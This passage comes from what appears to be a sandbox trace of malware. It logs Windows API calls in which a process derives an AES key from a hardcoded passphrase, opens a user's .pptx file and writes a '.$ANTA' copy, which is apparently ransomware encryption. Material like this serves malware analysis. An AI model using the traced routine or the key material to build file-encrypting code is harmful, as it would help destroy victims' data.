Size=0x8) returned 0x43e23a0 [0077.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0077.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0077.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0077.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0077.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0077.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0077.915] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.915] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.915] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0077.915] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1797108, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0077.915] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0077.915] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1797088, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0077.915] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0077.916] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0077.916] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0077.916] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0077.916] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0077.916] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.916] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0077.916] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.916] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0077.916] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.917] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0077.917] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca4f0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0077.917] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0077.917] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0077.917] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b48, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0077.917] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0077.917] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0077.917] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2848, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0077.917] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.917] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.917] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0077.917] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca7a8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0077.917] CryptHashData (hHash=0x41ac600, pbData=0x17e2bd8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0077.917] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.917] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0077.918] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.918] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0077.918] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca778, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0077.918] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac600, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac500) returned 1 [0077.918] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.918] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.918] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0077.918] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796f48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0077.918] CryptDestroyHash (hHash=0x41ac600) returned 1 [0077.918] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\QjLwz6.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\qjlwz6.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0077.918] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.918] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0077.919] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0077.919] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\QjLwz6.pptx.$ANTA" (normalized: "c:\\users\\fd1hvy\\documents\\qjlwz6.pptx.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0077.932] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0077.932] ReadFile (in: hFile=0x258, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ef28*=0x10000, lpOverlapped=0x0) returned 1 [0077.935] ReadFile (in: hFile=0x258, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ef28*=0x5a35, lpOverlapped=0x0) returned 1 [0077.936] ReadFile (in: hFile=0x258, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0077.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0077.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0077.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0077.936] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0077.936] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x15a35) returned 0x48f0048 [0077.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0b020 | out: hHeap=0x1780000) returned 1 [0077.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0077.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0077.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0077.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0077.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x15a35) returned 0x4905a88 [0077.944] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x48f0048 | out: hHeap=0x1780000) returned 1 [0077.944] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0077.944] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0077.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0077.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0077.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0077.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0077.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x15a35) returned 0x48f0048 [0077.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0077.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x48f0048 | out: hHeap=0x1780000) returned 1 [0077.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0077.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0077.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0077.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0077.945] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0077.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0077.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0077.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0077.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0077.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0077.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0077.945] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0077.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0077.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b98 [0077.945] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0077.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b98 | out: hHeap=0x1780000) returned 1 [0077.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0077.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0077.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2630 [0077.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0077.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0077.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0077.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0077.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x15a35) returned 0x48f0048 [0077.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0077.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26d0 [0077.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0077.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0077.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0077.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2640 [0077.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0077.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0077.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0077.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25d0 [0077.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0077.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0077.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0077.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca310 [0077.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0077.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0077.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0077.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0077.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0077.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x15a35) returned 0x491b4c8 [0077.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0077.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0077.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0077.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0077.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0077.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0077.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0077.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0077.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0077.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0077.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0077.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0077.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0077.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0077.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0077.949] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0077.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0077.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0077.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0077.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0077.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0077.949] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0077.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0077.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0077.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0077.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0077.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0077.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0077.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0077.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0077.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0077.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0077.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0077.950] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0077.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0077.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0077.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0077.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25e0 [0077.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0077.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0077.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0077.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0077.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6a0 [0077.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0077.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0077.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0077.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0077.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0077.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0077.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0077.950] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0077.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0077.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0077.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0077.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0077.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0077.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0077.951] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0077.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0077.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0077.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0077.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0077.951] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0077.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796d68 [0077.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0077.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0077.951] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0077.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2848 [0077.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0077.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0077.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0077.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0077.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0077.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0077.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0077.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0077.951] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0077.951] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0077.951] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0077.951] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0077.951] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0077.952] HeapFree (in: 